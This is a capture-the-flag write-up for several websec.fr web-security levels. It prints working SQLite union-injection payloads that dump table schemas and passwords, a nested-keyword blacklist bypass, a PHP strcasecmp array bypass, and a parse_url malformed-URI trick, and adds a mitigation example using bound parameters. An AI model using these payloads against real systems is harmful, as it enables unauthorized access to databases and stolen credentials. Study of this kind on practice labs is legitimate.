wp for websec

Practice challenges collected for the Wangding Cup (网鼎杯) competition.

http://websec.fr/

level 01

SQLite injection:
SQLite keeps a master table named sqlite_master; its name and sql columns hold the information about every other table.

input:
1 and 1=0 union select 1,(select name from sqlite_master)--+

GOT: users

input:
1 and 1=0 union select 1,(select sql from sqlite_master)--+

GOT:
CREATE TABLE users(id int(7), username varchar(255), password varchar(255))

input:
1 and 1=0 union select 1,(select group_concat(password) from users)--+

GOT: WEBSEC{Simple_SQLite_Injection}

level 02

SQLite injection; bypass a preg_replace blacklist for union, order, select, from, group, by.

The filter strips each keyword only once, so a keyword nested inside itself survives: select -> (stripped), but selselectect -> select, because the inner copy is removed and the outer letters are reassembled into the keyword.

input:
1 and 1=0 ununionion seselectlect 1,(seselectlect grgroupoup_concat(password) frofromm users)--+

GOT: WEBSEC{BecauseBlacklistsAreOftenAgoodIdea}
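As an added example (not code from the challenge or this writeup), the script below reproduces the single-pass keyword filter, assuming a case-insensitive preg_replace over the listed words, and sets it beside the iterative strip and the bound-parameter query a defender would actually rely on.

```php
<?php
// Added example, not the challenge's own code. The exact regex used by
// level 02 is an assumption; only the keyword list comes from the writeup.
$keywords = ['union', 'order', 'select', 'from', 'group', 'by'];
$pattern  = '/' . implode('|', array_map('preg_quote', $keywords)) . '/i';

// Vulnerable: each keyword is removed once. A keyword nested inside itself
// ("seselectlect") loses its inner copy and the outer copy is reassembled.
function naive_filter(string $input, string $pattern): string {
    return preg_replace($pattern, '', $input);
}

// Stop-gap: repeat until the string stops changing, so nesting cannot survive.
// Still a blacklist, so it belongs next to, not instead of, bound parameters.
function iterative_filter(string $input, string $pattern): string {
    do {
        $before = $input;
        $input  = preg_replace($pattern, '', $input);
    } while ($input !== $before);
    return $input;
}

$payload = '1 and 1=0 ununionion seselectlect 1,'
         . '(seselectlect grgroupoup_concat(password) frofromm users)--';
echo "naive:     ", naive_filter($payload, $pattern), "\n";     // keywords rebuilt
echo "iterative: ", iterative_filter($payload, $pattern), "\n"; // keywords gone

// Real fix: bind the value instead of splicing it into the SQL text. SQLite
// then compares it as a literal and the injected clause is never parsed.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users(id int(7), username varchar(255), password varchar(255))');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'constructed-sample-password')");
$stmt = $db->prepare('SELECT id, username FROM users WHERE id = :id');
$stmt->execute([':id' => $payload]); // no row has this literal id
echo "bound rows (payload): ", count($stmt->fetchAll(PDO::FETCH_ASSOC)), "\n";
$stmt->execute([':id' => '1']);      // the intended lookup still works
echo "bound rows (id 1):    ", count($stmt->fetchAll(PDO::FETCH_ASSOC)), "\n";
```

Requires the pdo_sqlite extension; run with `php example.php`.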

level 03

level 17


<?php
include "flag.php";

function random_delay() { // function name was not preserved in the listing; assumed here
    $range = 100000;
    $bytes = (int) (log($range, 2) / 8) + 1;
    do { /* Side effect: more random cpu cycles wasted ;) */
        $rnd = hexdec(bin2hex(openssl_random_pseudo_bytes($bytes)));
    } while ($rnd >= $range);
    usleep($rnd);
}
?>

<?php
// strcasecmp() given an array returns NULL (with a warning) on PHP 7, and !NULL is true.
if (! strcasecmp ($_POST['flag'], $flag))
    echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';
else
    echo '<div class="alert alert-danger">Invalid flag, sorry.</div>';
?>

Actually, it's just a strcasecmp bypass trick, like the one for strcmp: when the first argument is an array, strcasecmp returns NULL instead of an integer, and the negation makes the check pass. So we POST flag[]= as an array and get the flag.
GOT: WEBSEC{It_seems_that_php_could_use_a_stricter_typing_system}

level 25

source code:


<?php
// Only the query string that parse_url() extracts from the raw REQUEST_URI is checked.
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}

// The include itself reads $_GET, which PHP populated independently of parse_url().
include $_GET['page'] . '.txt';

If we make parse_url($_SERVER['REQUEST_URI']) return null (it fails on a malformed URI), $query ends up empty, the loop never sees the word "flag", and we bypass the check, while $_GET['page'] is still set.
So we use:
http://websec.fr/level25/index.php?a=a:123/index.php&page=flag

GOT: WEBSEC{How_am_I_supposed_to_parse_uri_when_everything_is_so_broooken}